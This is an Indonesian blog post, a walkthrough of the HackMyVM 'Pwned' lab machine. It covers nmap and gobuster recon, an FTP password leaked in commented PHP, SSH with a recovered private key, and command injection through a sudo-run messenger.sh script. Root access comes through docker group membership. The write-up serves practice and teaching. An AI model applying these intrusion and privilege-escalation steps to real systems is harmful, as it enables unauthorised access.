<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HackMyVM: Pwned | sharpicx</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="HackMyVM: Pwned" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Pwned adalah salah satu mesin yang dirilis setelah perilisan mesin Gift. mempunyai difficulty yang sama yaitu, Easy. Kenapa dari kemaren saya milih yang berbau easy-easy alias mudah-mudah? karena saya ingin menyelesaikan HMV itu urut (niatnya) dan juga alasan kedua untuk mengembalikan memori ingatan saya tentang boot2root. Tapi Tergantung kalo lagi mood ya cepet-cepetan." />
<meta property="og:description" content="Pwned adalah salah satu mesin yang dirilis setelah perilisan mesin Gift. mempunyai difficulty yang sama yaitu, Easy. Kenapa dari kemaren saya milih yang berbau easy-easy alias mudah-mudah? karena saya ingin menyelesaikan HMV itu urut (niatnya) dan juga alasan kedua untuk mengembalikan memori ingatan saya tentang boot2root. Tapi Tergantung kalo lagi mood ya cepet-cepetan." />
<link rel="canonical" href="http://localhost:4000/2021/05/12/hmv-pwned" />
<meta property="og:url" content="http://localhost:4000/2021/05/12/hmv-pwned" />
<meta property="og:site_name" content="sharpicx" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-05-12T23:34:56+07:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HackMyVM: Pwned" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-05-12T23:34:56+07:00","datePublished":"2021-05-12T23:34:56+07:00","description":"Pwned adalah salah satu mesin yang dirilis setelah perilisan mesin Gift. mempunyai difficulty yang sama yaitu, Easy. Kenapa dari kemaren saya milih yang berbau easy-easy alias mudah-mudah? karena saya ingin menyelesaikan HMV itu urut (niatnya) dan juga alasan kedua untuk mengembalikan memori ingatan saya tentang boot2root. Tapi Tergantung kalo lagi mood ya cepet-cepetan.","headline":"HackMyVM: Pwned","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/05/12/hmv-pwned"},"url":"http://localhost:4000/2021/05/12/hmv-pwned"}</script>
<!-- End Jekyll SEO tag -->


<meta name="keywords" content="mis-config,docker,gtfobins,ftp" />

<link rel="shortcut icon" href="/favicon.ico" />
<link rel="apple-touch-icon" href="/favicon.ico"/>
<link rel="alternate" type="application/rss+xml" title="sharpicx - linux & cybersecurity big fan " href="/feed.xml" />
<link rel="stylesheet" type="text/css" href="/assets/css/base.css" />
<link rel="stylesheet" type="text/css" href="/assets/css/highlight.css" />
<!-- <link rel="stylesheet" href="https://hackerthemes.com/bootstrap-themes/demo/theme-machine/neon-glow/css/bootstrap4-neon-glow.min.css"> -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">

<!--[if lt IE 9]>
  <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->


<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async ></script>


<script src="/assets/script/jekyllpaper.js" async ></script>
<script src="https://unpkg.com/mermaid@8.5.1/dist/mermaid.min.js" onload="javascript:loadMermaid();" async></script>


</head>
<body>
  <div class="container-wrapper">
    <header class="container-header">
      <div class="header-info">
  <span class="header-info-name">sharpicx</span><br/>
  <span class="header-info-desc" style="padding-left: 25px">linux & cybersecurity big fan </span>
</div>
<nav class="header-nav">
  <ul class="header-main-nav">
  
    <li class="header-main-nav-item"><a href="/">home</a></li>
  
    <li class="header-main-nav-item"><a href="/category">categories</a></li>
  
    <li class="header-main-nav-item"><a href="/about">whoami</a></li>
  
  </ul>
</nav>

    </header>
    <main class="container-main">
      <article class="container-post">
  <div class="post-title" style="padding: 0px 0px 20px 0px">
    <h1>HackMyVM: Pwned</h1>
  </div>
  <div class="post-author">
    <span>sharpicx</span>
  </div>
  <div class="post-content">
    <p><a href="https://hackmyvm.eu/machines/machine.php?vm=Pwned">Pwned</a> adalah salah satu mesin yang dirilis setelah perilisan mesin <a href="https://hackmyvm.eu/machines/machine.php?vm=Gift">Gift</a>. mempunyai difficulty yang sama yaitu, <em>Easy</em>. Kenapa dari kemaren saya milih yang berbau easy-easy alias mudah-mudah? karena saya ingin menyelesaikan <a href="https://hackmyvm.eu">HMV</a> itu urut (niatnya) dan juga alasan kedua untuk mengembalikan memori ingatan saya tentang <em>boot2root</em>. Tapi Tergantung kalo lagi mood ya cepet-cepetan.</p>

<h2 id="summary">Summary</h2>
<ul>
  <li>me-recon directory hingga menemukan <strong>/hidden_text</strong> untuk mendapatkan file <strong>secret.dic</strong>.</li>
  <li>lanjut lagi merecon dengan wordlist <strong>secret.dic</strong> sampai bertemu dengan <em>miss configuration</em> <strong>/pwned.vuln</strong> dengan username dan password <em>ftp</em> saat di<em>view source</em>.</li>
  <li>lalu login <em>ftp client</em> dengan <em>user</em> dan <em>pass</em> yang didapat tadi. dan masuk ke <em>dir</em> <strong>/share</strong> untuk mendapatkan <strong>id_rsa</strong> dan sebuah note kecil dengan nama <strong>note.txt</strong>.</li>
  <li>login user <em>shell</em> via <strong>ssh</strong> dengan user yang terdapat dalam file note kecil tadi.</li>
  <li>getting first flag <strong>user1.txt</strong>.</li>
  <li>perintah <strong>sudo -l</strong> menunjukkan bahwa ada salah satu user yang mempunyai hak terhadap akses group <em>root</em> harus melewati <em>shell</em> script yang ada dalam <em>dir</em> <strong>/home</strong> bernama <strong>messenger.sh</strong>.</li>
  <li>didalam script tersebut berisi barisan kode yang jika kita mengirimkan suatu input-an didalam kolom pesan dan dieksekusi bisa mendapatkan output yang diinginkan, kenapa? karna didalam script tersebut terdapat <strong>2&gt; /dev/null</strong>.</li>
  <li>setelah mengeksekusi, kita bisa masuk dan getting second flag <strong>user2.txt</strong>.</li>
  <li><em>PrivEsc</em> menggunakan docker images untuk keluar dari batasan lingkungan system dengan cara memunculkan interaktif root shell.</li>
  <li>Gaining root access and getting last flag <strong>root.txt</strong>.</li>
</ul>

<h2 id="contents">Contents</h2>
<ul>
  <li><a href="#recon">Reconnaissance</a>
    <ul>
      <li><a href="#netdiscover">Getting IP Host Machine</a></li>
      <li><a href="#nmap">Using Nmap</a></li>
      <li><a href="#gobuster">Directory Bruteforce</a></li>
    </ul>
  </li>
  <li><a href="#miss">Miss Configuration</a></li>
  <li><a href="#ftp">FTP as ftpuser</a></li>
  <li><a href="#flag">Getting Flag</a>
    <ul>
      <li><a href="#ariana">SSH as ariana</a></li>
      <li><a href="#selena">Shell as selena</a></li>
    </ul>
  </li>
  <li><a href="#privesc">Escalating root</a></li>
  <li><a href="#end">END</a></li>
  <li><a href="#referensi">Referensi</a></li>
</ul>

<h2 id="recon">Recon</h2>
<h3 id="netdiscover">Getting IP Host Machine</h3>
<p>ini karena lupa cara pake netdiscover jadinya pake linux lightweight yang berada dalam jaringan host yang sama <strong>vboxnet0</strong> untuk scanning <em>IP</em>. (gila gw udah setahun gk ngapa”in di bidang cybersec, alias sekolah).</p>

<p><img src="https://i.ibb.co/mJWJSSM/netdis-pwned.jpg" alt="kek" /></p>

<p>Loh kok ditutupin MAC Addressnya? bukannya tidak masalah ya? jadi gini bro, Tadinya saya mikir emang tidak masalah untuk ditunjukkan tapi kemudian berubah pikiran dan ngecek sana sini, ternyata masih nyambung sama <em>real machine</em> saya. Jadi Yauds, saya tutupin takut kena osint.</p>

<h3 id="nmap">Using Nmap</h3>
<p>seperti biasanya, <strong>nmap</strong> mengeluarkan hal-hal menarik tentang port yang terbuka.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report <span class="k">for </span>pwned.hmv <span class="o">(</span>192.168.56.102<span class="o">)</span>
Host is up, received arp-response <span class="o">(</span>0.00051s latency<span class="o">)</span><span class="nb">.</span>
Scanned at 2021-05-26 02:07:03 WIB <span class="k">for </span>9s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e <span class="o">(</span>RSA<span class="o">)</span>
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaQPyAx8qSGlWyyuL5xu/6lWdbWs6VArMlRC71wt11kYKMGUTuVmPvLAdSAL66haaz0DCvquZMOmeYNHvM7/OjfmkwlIt3Wv53q/23AODRwPGkpj00QCNH/Vqt6Aw94Afo3etyW9SU3vzLC2F3mS18cqXApmV90NIH3d6ayhsDP+aPuQFoFqEzDxzy2RkosueaEERECT0auT+pTIwRMCHBEVX98Srd8+ax1yhWITRTGOYXcdocx0m9tooFUEH/a1P3RK3gBzCL63ZejMN9YofBl8y+CwCt+0nBLg+PtNjjskD9CaBwxUmH0/UM24z9BQecPn3IFmm3+P5U0z1DQEhf
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d <span class="o">(</span>ECDSA<span class="o">)</span>
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDHWpwgF92XD4REIANL7X9lMcQSwcbhlNqwBvNi8l4SzQn5MjSzlBQzgcC7Kro57lCr0kImH+XdijG+r6lyps70<span class="o">=</span>
|   256 <span class="nb">dd</span>:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a <span class="o">(</span>ED25519<span class="o">)</span>
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHPgRt1LF33Ttn5DuGuJJpmgbMd2ofAkqEt6gTOQK+WW
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 <span class="o">((</span>Debian<span class="o">))</span>
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 <span class="o">(</span>Debian<span class="o">)</span>
|_http-title: Pwned....!!
MAC Address: 08:00:27:01:9D:03 <span class="o">(</span>Oracle VirtualBox virtual NIC<span class="o">)</span>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device <span class="nb">type</span>: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.91%E<span class="o">=</span>4%D<span class="o">=</span>5/26%OT<span class="o">=</span>21%CT<span class="o">=</span>%CU<span class="o">=</span>31655%PV<span class="o">=</span>Y%DS<span class="o">=</span>1%DC<span class="o">=</span>D%G<span class="o">=</span>N%M<span class="o">=</span>080027%TM
OS:<span class="o">=</span>60AD4AE0%P<span class="o">=</span>x86_64-unknown-linux-gnu<span class="o">)</span>SEQ<span class="o">(</span><span class="nv">SP</span><span class="o">=</span>107%GCD<span class="o">=</span>3%ISR<span class="o">=</span>107%TI<span class="o">=</span>Z%CI<span class="o">=</span>Z%
OS:II<span class="o">=</span>I%TS<span class="o">=</span>A<span class="o">)</span>OPS<span class="o">(</span><span class="nv">O1</span><span class="o">=</span>M5B4ST11NW7%O2<span class="o">=</span>M5B4ST11NW7%O3<span class="o">=</span>M5B4NNT11NW7%O4<span class="o">=</span>M5B4ST11N
OS:W7%O5<span class="o">=</span>M5B4ST11NW7%O6<span class="o">=</span>M5B4ST11<span class="o">)</span>WIN<span class="o">(</span><span class="nv">W1</span><span class="o">=</span>FE88%W2<span class="o">=</span>FE88%W3<span class="o">=</span>FE88%W4<span class="o">=</span>FE88%W5<span class="o">=</span>FE8
OS:8%W6<span class="o">=</span>FE88<span class="o">)</span>ECN<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>FAF0%O<span class="o">=</span>M5B4NNSNW7%CC<span class="o">=</span>Y%Q<span class="o">=)</span>T1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40
OS:%S<span class="o">=</span>O%A<span class="o">=</span>S+%F<span class="o">=</span>AS%RD<span class="o">=</span>0%Q<span class="o">=)</span>T2<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T3<span class="o">(</span><span class="nv">R</span><span class="o">=</span>N<span class="o">)</span>T4<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F<span class="o">=</span>R%O<span class="o">=</span>
OS:%RD<span class="o">=</span>0%Q<span class="o">=)</span>T5<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T6<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%
OS:W<span class="o">=</span>0%S<span class="o">=</span>A%A<span class="o">=</span>Z%F<span class="o">=</span>R%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=)</span>T7<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>Y%T<span class="o">=</span>40%W<span class="o">=</span>0%S<span class="o">=</span>Z%A<span class="o">=</span>S+%F<span class="o">=</span>AR%O<span class="o">=</span>%RD<span class="o">=</span>0%Q<span class="o">=</span>
OS:<span class="o">)</span>U1<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DF<span class="o">=</span>N%T<span class="o">=</span>40%IPL<span class="o">=</span>164%UN<span class="o">=</span>0%RIPL<span class="o">=</span>G%RID<span class="o">=</span>G%RIPCK<span class="o">=</span>G%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%
OS:DFI<span class="o">=</span>N%T<span class="o">=</span>40%CD<span class="o">=</span>S<span class="o">)</span>

Uptime guess: 5.344 days <span class="o">(</span>since Thu May 20 17:51:40 2021<span class="o">)</span>
Network Distance: 1 hop
TCP Sequence Prediction: <span class="nv">Difficulty</span><span class="o">=</span>263 <span class="o">(</span>Good luck!<span class="o">)</span>
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms pwned.hmv <span class="o">(</span>192.168.56.102<span class="o">)</span>

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Wed May 12 02:07:12 2021 -- 1 IP address (1 host up) scanned in 9.68 seconds</span>

</code></pre></div></div>
<p>Oke, diatas terlihat ada tiga port yang bisa diraih, FTP (21), SSH (22), HTTP (80).
Karna di index terlihat seperti <strong>bekas-bekas</strong> 4n4k-4n4k ngedeface, so saya mencoba untuk scanning directory di situs target yang IP mesin-nya sudah saya saved di /etc/hosts dengan domain <strong>pwned.hmv</strong>.
(pake kata “sudah” ditambah “saved” anjay <a href="https://arabunaa.blogspot.com/2019/07/pengertian-taukid-dalam-ilmu-nahwu.html">taukid</a>).</p>

<h2 id="gobuster">Directory Bruteforce</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>auvia pwned <span class="c"># gobuster dir -u pwned.hmv -w /dictionary/seclists/Discover/Web-Content/directory-list-2.3-medium.txt  </span>

</code></pre></div></div>
<p>Output yang dikeluarkan sangat mengesankan yaitu ada 2 buah <code class="language-plaintext highlighter-rouge">dir</code> yang agak menarik perhatian.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/nothing              <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 308] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://pwned.hmv/nothing/]
/server-status        <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 274]
/hidden_text          <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 312] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://pwned.hmv/hidden_text/]
</code></pre></div></div>
<p>untuk <code class="language-plaintext highlighter-rouge">/nothing</code> sendiri, sangat meng-anjingkan gitu. coz ketika saya cek memang ya benar benar membuang waktu dan memang membuat saya menyesal.</p>

<p><img src="https://i.ibb.co/DzwSPV8/pwned-2.png" alt="gambar nothing" /></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;title&gt;</span>Nothing<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>

<span class="nt">&lt;h1&gt;</span>i said nothing bro <span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;p&gt;&lt;/p&gt;</span>

<span class="c">&lt;!--I said nothing here. you are wasting your time i don't lie--&gt;</span>



<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span> 

</code></pre></div></div>
<p>untuk bagian <code class="language-plaintext highlighter-rouge">/hidden_text</code>, disitu terlihat <em>Apache Directory Listing</em> yang hanya ada satu file bernama <code class="language-plaintext highlighter-rouge">secret.dic</code>, dan didalam file tersebut terlihat banyak semacam list-an(?) wordlist(?).</p>

<p><img src="https://i.ibb.co/Zg7W9rz/pwned-4.png" alt="1" />
<img src="https://i.ibb.co/pZNFj6S/pwned-3.png" alt="2" /></p>

<p>Im do it again.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>auvia pwned <span class="c"># gobuster dir -u pwned.hmv -w secret.dic</span>

</code></pre></div></div>
<p>Dan yah, dapet sesuatu lagi.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//pwned.vuln          <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 311] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://pwned.hmv/pwned.vuln/]
</code></pre></div></div>
<h2 id="miss">Miss Configuration</h2>
<p><img src="https://i.postimg.cc/qRMWTVHt/pwned-5.png" alt="miss" /></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html&gt;</span>
	<span class="nt">&lt;head&gt;</span> 
		<span class="nt">&lt;title&gt;</span>login<span class="nt">&lt;/title&gt;</span>
	<span class="nt">&lt;/head&gt;</span>
	<span class="nt">&lt;body&gt;</span>
		<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"main"</span><span class="nt">&gt;</span>
			<span class="nt">&lt;h1&gt;</span> vanakam nanba. I hacked your login page too with advanced hacking method<span class="nt">&lt;/h1&gt;</span>
			<span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
			Username <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"username"</span> <span class="na">class=</span><span class="s">"text"</span> <span class="na">autocomplete=</span><span class="s">"off"</span> <span class="na">required</span><span class="nt">&gt;</span>
			Password <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"password"</span> <span class="na">name=</span><span class="s">"password"</span> <span class="na">class=</span><span class="s">"text"</span> <span class="na">required</span><span class="nt">&gt;</span>
			<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">name=</span><span class="s">"submit"</span> <span class="na">id=</span><span class="s">"sub"</span><span class="nt">&gt;</span>
			<span class="nt">&lt;/form&gt;</span>
		<span class="nt">&lt;/div&gt;</span>
	<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>




<span class="cp">&lt;?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' &amp;&amp; $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?&gt;</span>

</code></pre></div></div>

<p>Satu hal yang saya tanyakan. Kenapa dia bisa meletakkan sebuah sytax <code class="language-plaintext highlighter-rouge">php</code> dan terus dicomment gitu ataukah lupa (namanya juga miss?) BLOK GOBLOK. Letak motivasinya tu dimana gitu LOL TOLOL. untung simulasi yekan kalo real mah tololnya minta ampun xixixi.</p>

<h2 id="ftp">FTP as ftpuser</h2>
<p><img src="https://i.postimg.cc/9XG2c1yB/pwned.png" alt="ftp" /></p>

<p>diatas terdapat 2 file yang sudah saya katakan sebelumnya pada <a href="#summary">summary</a>. rangkuman yang sebenarnya bukan penjelasan yang singkat tetapi panjang. Yap, <strong>id_rsa</strong> adalah bagian RSA key fingerprint dalam SSH yang bersifat private alias diprivasi dan tidak boleh disebar luaskan, kepada siapapun. for example, tingkat lanjut untuk bisa mengakses shell dan free password :).</p>

<h2 id="flag">Getting Flag</h2>
<h3 id="ariana">SSH as ariana</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>auvia pwned <span class="c"># chmod 600 id_rsa</span>
auvia pwned <span class="c"># cat note.txt</span>

Wow you are here 

ariana won<span class="s1">'t happy about this note 

sorry ariana :(

</span></code></pre></div></div>
<p>dari <strong>note.txt</strong> yang saya baca, disitu bisa dibayangkan bahwa ada seseorang mengirimkan pesan kepada <em>user</em> <strong>ariana</strong> berisi permintaan maaf tentang suatu hal/tindakan/kelakuan yang tidak bisa membuat ariana senang. so, tanpa basa basi mari kita sshing kpd <em>user</em> <em>ariana</em> ini, menggunakan <strong>id_rsa</strong> yang kita dapat tadi.</p>

<p><img src="https://i.postimg.cc/DZFpmDsV/pwned-7.png" alt="pwned7" /></p>

<p>we got the flag! ok now yang saya lakukan adalah membaca diary personal milik <em>ariana</em>. Siapa tau aja ada hint disana.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ariana@pwned:~<span class="nv">$ </span><span class="nb">cat </span>ariana-personal.diary
Its Ariana personal Diary :::

Today Selena fight with me <span class="k">for </span>Ajay. so i opened her hidden_text on server. now she resposible <span class="k">for </span>the issue.

</code></pre></div></div>
<p>ternyata Ariana ini sedang ada konflik percintaan (maybe) dengan seseorang yang mungkin masih ada hubungan pertemanan atau seseorang yang bisa dianggap sebagai kenalan untuk berebut laki (maybe) yang bernama Ajay.</p>

<h2 id="selena">Shell as selena</h2>
<p>Saya mencoba untuk memastikan apakah dalam satu mesin ada user lain dengan perintah <code class="language-plaintext highlighter-rouge">ls</code> untuk <em>lists files</em> terhadap <em>directory home</em></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ariana@pwned:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span> /home
total 24
drwxr-xr-x  5 root   root   4096 Jul 10  2020 <span class="nb">.</span>
drwxr-xr-x 18 root   root   4096 Jul  6  2020 ..
drwxrwx---  4 ariana ariana 4096 Jul 10  2020 ariana
drwxrwxrwx  3 root   root   4096 Jul  9  2020 ftpuser
<span class="nt">-rwxr-xr-x</span>  1 root   root    367 Jul 10  2020 messenger.sh
drwxrwx---  3 selena root   4096 Jul 10  2020 selena

</code></pre></div></div>
<p>ternyata ada user <em>selena</em> yang directory-nya tidak bisa dimasuki karena mempunyai hak akses group terhadap <em>superuser</em> yang sering disebut sebagai <em>root</em>. dan ada sebuah script shell yang disitu dinamakan sebagi <strong>messenger.sh</strong>. Apakah script ini untuk mengirim pesan kepada seseorang atau bagaimana? Lalu saya mencoba untuk masuk superuser.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ariana@pwned:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>ariana on pwned:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin

User ariana may run the following commands on pwned:
    <span class="o">(</span>selena<span class="o">)</span> NOPASSWD: /home/messenger.sh

</code></pre></div></div>
<p>Ada sesuatu nih, bahwa untuk masuk user <em>selena</em> saya harus menjalankan atau mengeksekusi script tadi. saya mencoba untuk membaca isi kode tersebut.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ariana@pwned:~<span class="nv">$ </span><span class="nb">cat</span> /home/messenger.sh
<span class="c">#!/bin/bash</span>

clear
<span class="nb">echo</span> <span class="s2">"Welcome to linux.messenger "</span>
		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">users</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat</span> /etc/passwd | <span class="nb">grep </span>home |  <span class="nb">cut</span> <span class="nt">-d</span>/ <span class="nt">-f</span> 3<span class="si">)</span>
		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$users</span><span class="s2">"</span>
		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">read</span> <span class="nt">-p</span> <span class="s2">"Enter username to send message : "</span> name 
		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">read</span> <span class="nt">-p</span> <span class="s2">"Enter message for </span><span class="nv">$name</span><span class="s2"> :"</span> msg
		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">echo</span> <span class="s2">"Sending message to </span><span class="nv">$name</span><span class="s2"> "</span>

<span class="nv">$msg</span> 2&gt; /dev/null

		<span class="nb">echo</span> <span class="s2">""</span>
<span class="nb">echo</span> <span class="s2">"Message sent to </span><span class="nv">$name</span><span class="s2"> :) "</span>
		<span class="nb">echo</span> <span class="s2">""</span>
</code></pre></div></div>
<p>oke disitu ada syntax <strong>$msg 2&gt; /dev/null</strong> yang dimana variabel pesan <strong>$msg</strong> atau <code class="language-plaintext highlighter-rouge">stderr</code> yang saya kirimkan itu bisa dieksekusi menjadi file, dengan menuju <em>null</em> tadi balik kepada yang saya inginkan, apa saja. Lebih jelasnya seperti ini.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ariana@pwned:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-u</span> selena /home/messenger.sh
</code></pre></div></div>
<p>saya mengganti user saya ke <em>selena</em> untuk mendapatkan <em>system shell</em>-nya, yaitu <code class="language-plaintext highlighter-rouge">/bin/bash</code>.
Oke output yang dihasilkan seperti ini.</p>

<p><img src="https://i.postimg.cc/Hn3C0kNd/pwned-8.png" alt="apasaja" /></p>

<p>and then boom! we got the 2nd flag for a long shit.</p>

<h2 id="privesc">Escalating root</h2>
<p>Oke, sekarang masuk pada bab <strong>Privilege Escalation</strong>. Dimana saya disini akan menjelaskan bagimana saya bisa masuk terhadap <em>system shell</em> milik <em>superuser</em> untuk mengendalikan semua. Oke ini saya males ngetik panjang-panjang karna capek.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>selena@pwned:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>selena<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>selena<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>selena<span class="o">)</span>,115<span class="o">(</span>docker<span class="o">)</span>
</code></pre></div></div>
<p>Oke disitu terlihat <strong>docker</strong> yang berfungsi untuk memisahkan proses-proses agar dapat berjalan dengan sendirinya. Bagi para pentester pasti tidak asing dengan yang namanya <a href="https://gtfobins.github.io/">gtfobins</a>.</p>

<p>Yap, tempat dimana para pentester menyelesaikan eskalasi terhadap superuser dalam Unix. <strong>gtfobins</strong> sendiri dalam situs resminya bisa dikatakan kumpulan Unix Binaries yang bisa digunakan untuk membypass larangan keamanan lokal dalam misconfigured (hilangnya konfigurasi) sistem. Kita cek dulu apa saja <em>docker images</em> yang tersimpan dalam mesin ini.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>selena@pwned:~<span class="nv">$ </span>docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
privesc             latest              09ae39f0f8fc        10 months ago       88.3MB
&lt;none&gt;              &lt;none&gt;              e13ad046d435        10 months ago       88.3MB
alpine              latest              a24bb4013296        12 months ago       5.57MB
debian              wheezy              10fcec6d95c4        2 years ago         88.3MB

</code></pre></div></div>
<p>Ada tiga <em>images</em> yang tersimpan, <strong>privesc</strong>, <strong>alpine</strong>, <strong>debian</strong>.</p>

<p><img src="https://i.postimg.cc/RZPfq1VZ/pwned-9.png" alt="privesc" /></p>

<p>Dan YAP!</p>

<h2 id="referensi">Referensi</h2>
<ul>
  <li><a href="https://askubuntu.com/questions/350208/what-does-2-dev-null-mean">https://askubuntu.com/questions/350208/what-does-2-dev-null-mean</a></li>
